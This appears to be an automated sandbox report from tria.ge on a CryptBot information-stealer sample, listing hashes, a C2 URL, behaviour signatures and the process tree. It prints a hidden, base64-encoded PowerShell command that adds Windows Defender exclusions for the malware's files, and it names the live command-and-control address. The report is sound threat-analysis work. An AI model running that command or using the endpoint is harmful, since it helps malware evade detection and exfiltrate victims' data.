Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15/02/2025, 18:56
Static task
static1
Behavioral task
behavioral1
Sample
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
Resource
win10v2004-20250207-en
General
-
Target
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
-
Size
3.8MB
-
MD5
f095f48a0fc5d1369e1e9a33f30624cf
-
SHA1
a87365138e7a92880051249411814562953a4307
-
SHA256
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c
-
SHA512
c2707019659aeda30ad1fba0b639800a7cd966be8e55fbf5ea09b79608e5f930b99b68792f86904645616af7c30ea93587852c12c68ccc62028c296963b3a2e2
-
SSDEEP
98304:ZsFwe8EuILKpQN0f7aePKtGBz/smtrm+2f/VSnGIm+LR4ZzK:FEoO0DaFGBz/sYK+2fIGImy
Malware Config
Extracted
cryptbot
http://home.elvnjj1sr.top/pekvtmslVrBVfMWtJqVA17
Signatures
-
Cryptbot family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x86.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4752 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2688 VC_redist.x64.exe 4872 VC_redist.x86.exe 5040 Token.exe -
Loads dropped DLL 6 IoCs
pid Process 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 5008 taskeng.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5040 set thread context of 4908 5040 Token.exe 40 -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x0008000000016c84-2811.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x86.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4752 powershell.exe 4872 VC_redist.x86.exe 4872 VC_redist.x86.exe 4872 VC_redist.x86.exe 4872 VC_redist.x86.exe 4872 VC_redist.x86.exe 5040 Token.exe 5040 Token.exe 4908 AddInUtil.exe 4908 AddInUtil.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2688 VC_redist.x64.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 5040 Token.exe Token: SeDebugPrivilege 4908 AddInUtil.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2804 wrote to memory of 2688 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 31 PID 2804 wrote to memory of 2688 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 31 PID 2804 wrote to memory of 2688 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 31 PID 2804 wrote to memory of 2688 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 31 PID 4720 wrote to memory of 4752 4720 taskeng.exe 35 PID 4720 wrote to memory of 4752 4720 taskeng.exe 35 PID 4720 wrote to memory of 4752 4720 taskeng.exe 35 PID 2804 wrote to memory of 4872 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 37 PID 2804 wrote to memory of 4872 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 37 PID 2804 wrote to memory of 4872 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 37 PID 2804 wrote to memory of 4872 2804 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 37 PID 5008 wrote to memory of 5040 5008 taskeng.exe 39 PID 5008 wrote to memory of 5040 5008 taskeng.exe 39 PID 5008 wrote to memory of 5040 5008 taskeng.exe 39 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 PID 5040 wrote to memory of 4908 5040 Token.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe"C:\Users\Admin\AppData\Local\Temp\1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4872
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B3AF52FB-EC91-477B-9499-22858A60A6AF} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBNAFAAcAByAEUAZgBFAFIAZQBOAGMARQAgAC0ARQBYAEMATAB1AFMAaQBvAG4AUABhAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBvAHIAYwBFADsAIABBAEQAZAAtAG0AUABQAFIARQBmAGUAUgBlAG4AYwBlACAALQBlAHgAYwBMAHUAUwBJAG8ATgBwAFIAbwBDAEUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACAALQBmAG8AcgBDAEUA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F3A0E619-44F0-4D4A-BAF5-B6AE59DBB3A0} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exeC:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
653KB
MD54f6e118ff053bda4f358922e704e6e2d
SHA1b09ee9ecb9b16910e7d5b0b151095655eac86666
SHA256c4d8a65844301bbe75699e5de0d2a576f1fa07e0cf259810bdc68b045cb14225
SHA512a78fb7027e39f29cb768cd0f6ed11ab4e56179b04b782f0f293fe0743fc88e418da8ea9698d78ff462cb650694fc4a14003537f4decb0db6313061a1afa25b4c
-
Filesize
8.2MB
MD595a8e03433879dc9bbe059a6f8ba3f5c
SHA19b15abecbc64573f9709847e22c2006a2bfec327
SHA256c09055cde3e0d6c5ebad2cf79f3e735c3ce5f5ded864130098fe2c4165b99fa1
SHA5123d1d9c0e77085258bfb834ca5d65e6aaad3a3a3a426cda50f2a6b99ad03c65b83f25a853a3a8c900aa01fe17e0a741b73bf20364006d1a16a5c21356095c49c5